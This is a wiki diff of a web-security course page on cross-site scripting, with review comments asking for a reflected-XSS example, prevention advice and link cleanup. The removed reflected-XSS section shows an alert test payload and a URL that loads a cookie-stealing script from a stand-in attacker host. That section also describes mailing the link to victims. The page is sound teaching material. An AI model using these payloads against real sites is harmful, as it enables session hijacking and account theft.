Differences

This page shows the differences between two versions of the page.

modul:m183:learningunits:lu10:lu10b [2025/12/27 19:30] – created dgaravaldi
modul:m183:learningunits:lu10:lu10b [2026/01/28 16:35] (current) dgaravaldi
Line 1: Line 1:
-====== LU10b - Reflected cross site scripting (XSS) attacks ======  +====== LU10b - Cross-Site Scripting (XSS) Attacks ====== 
-\\ +<sup>Internal reference: lu/10-2.md</sup>\\
-==== What is a reflected XSS attack ====+
  
-Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.+**Cross-site scripting (XSS)** is very common type of web application attack vector in which malicious code is injected into vulnerable web application. Unlike other attacks that target the application’s server or database directly, XSS targets the **users of the web application** — because the injected code runs in their browsers in the context of the legitimate website
  
-The script is activated through a linkwhich sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitizedwhich allows for the manipulation of a web application’s functions and the activation of malicious scripts.+A successful XSS attack can cause serious damage — including compromised user accountsactivation of Trojan code, manipulation of page content to trick users into sharing sensitive data, or exposure of session cookies that allow attackers to impersonate valid users
  
-To distribute the malicious link, a perpetrator typically embeds it into an email or third party website (e.g., in a comment section or in social media). The link is embedded inside an anchor text that provokes the user to click on it, which initiates the XSS request to an exploited websitereflecting the attack back to the user.+\\ 
 +==== Types of XSS Attacks ==== 
 + 
 +There are **two major types** of cross-site scripting attacks commonly discussed: 
 + 
 +    * **Stored XSS (Persistent)** – A malicious script is permanently injected into an application and served to all users.  
 +    * **Reflected XSS (Non-Persistent)** – A malicious script is embedded in a URL or request, then reflected off the web server back to the user’s browser when the link is visited
  
 \\ \\
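Review bot: the Types list presents reflected XSS as one of the two major types, but this revision removes the entire reflected-XSS walkthrough (the `alert('xss')` search query, the `q=` URL and the email-distribution story) and nothing later on the page returns to it, so a reader meets reflected XSS only in this one bullet. Either keep a short reflected example under its own heading after the stored-XSS material, or reword the bullet so it says where reflected XSS is covered; the broadened title `Cross-Site Scripting (XSS) Attacks` promises both types.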
-==== Reflected XSS attack example ====+==== What is Stored Cross-Site Scripting ====
  
-Unlike a stored attack, where the perpetrator must locate a website that allows for permanent injection of malicious scripts, reflected attacks only require that the malicious script be embedded into a link. That being said, in order for the attack to be successful, the user needs to click on the infected link. 
  
-As such, there are number of key differences between reflected and stored XSS attacksincluding:+To execute **stored XSS attack**the attacker must find a vulnerability in a web application where user input is stored without proper validation or escaping. A common example is when a comment field or form accepts HTML input and embeds it directly into pages viewed by other users. 
  
-    Reflected attacks are more common. +**Example**: An attacker enters comment containing JavaScript that steals session cookies. Every visitor who views the comment will run the malicious script unknowingly
-    Reflected attacks do not have the same reach as stored XSS attacks. +
-    Reflected attacks can be avoided by vigilant users. +
-    With reflected XSS, the perpetrator plays a “numbers game” by sending the malicious link to as many users as possible, thereby improving his odds of successfully executing the attack.+
  
 \\ \\
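Review bot: the stored-XSS section names the root cause (user input stored without proper validation or escaping, a comment field whose HTML is embedded directly into pages other users view) but no part of the new page says how to close it. Add a short prevention paragraph before the "How Stored XSS Endangers Users" list: HTML-encode the stored comment at the point where it is written into the page (output encoding for the HTML context, so a `<script>` tag is rendered as text rather than executed), treat input filtering only as a second layer, and set a Content Security Policy that disallows inline scripts so an encoding mistake does not become a full compromise. As written, the learner gets the risk but no countermeasure.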
-==== Reflected XSS attack example ==== +==== Stored XSS Attack — Step by Step ==== 
-While visiting a forum site that requires users to log in to their account, a perpetrator executes this search query <code><script type='text/javascript'>alert('xss');</script></code> causing the following things to occur:+{{:modul:m183:learningunits:lu10:stored-xss.png?600}}
  
-The query produces an alert box saying:+    - The attacker discovers a page with an input field that allows HTML. 
 +    - They insert malicious JavaScript code into that field.  
 +    - The application stores and later serves that code as part of normal content. 
 +    - When other users visit the page, their browser executes the attack script. 
  
-<code> +\\ 
-<script type='text/javascript'>alert('XSS');</script > not found+==== How Stored XSS Endangers Users ==== 
-</code>+Stored XSS is especially dangerous because: 
 + 
 +    * It can impact **all users** who view the infected page.  
 +    * Attacker-controlled scripts can steal session credentials or redirect users to phishing sites.  
 +    * Malicious payloads can embed external JavaScript that reports user data back to the attacker.  
 + 
 +\\ 
 +==== Related Topics ==== 
 +[1]: https://owasp.org/www-community/attacks/xss/ Cross Site Scripting (XSS) | OWASP
  
-The page's URL reads <code>http://ecommerce.com?q=<script type='text/javascript'>alert('XSS'); </script></code>. +[2]: https://developer.mozilla.org/docs/Web/Security/Attacks/XSS?utm_source=chatgpt.com Cross-site scripting (XSS) - Security | MDN
-This tells the perpetrator that the website is vulnerable. Next, he creates his own URL,  +
-which reads <code>http://forum.com?q=news<\script%20src="http://hackersite.com/authstealer.js"</code> and embeds it as a  +
-link into a seemingly harmless email, which he sends to a group of forum users.+
  
-While the sending address and subject line may appear suspect to some, it does not mean that it won’t be clicked on.+----
  
-In fact, even if only one in every 1,000 recipients of the email click on the link, that still amounts to several dozen infected forum usersThey will be taken to the forum’s website, where the malicious script will be reflected back to their browser, enabling the perpetrator to steal their session cookies and hijack their forum accounts.+[[https://creativecommons.org/licenses/by-nc-sa/4.0/|{{https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png}}]] Daniel Garavaldi
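Review bot: the MDN entry under Related Topics carries a `?utm_source=chatgpt.com` tracking parameter; strip it so the reference reads `https://developer.mozilla.org/docs/Web/Security/Attacks/XSS`. Both references also use Markdown-style `[1]:` definitions while the rest of the page, including the licence line directly below, uses the wiki's `[[url|text]]` link syntax; switching them keeps the titles as link text and matches the page's own convention.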
 • modul/m183/learningunits/lu10/lu10b.1766860255.txt.gz
 • Last modified: 2025/12/27 19:30
 • by dgaravaldi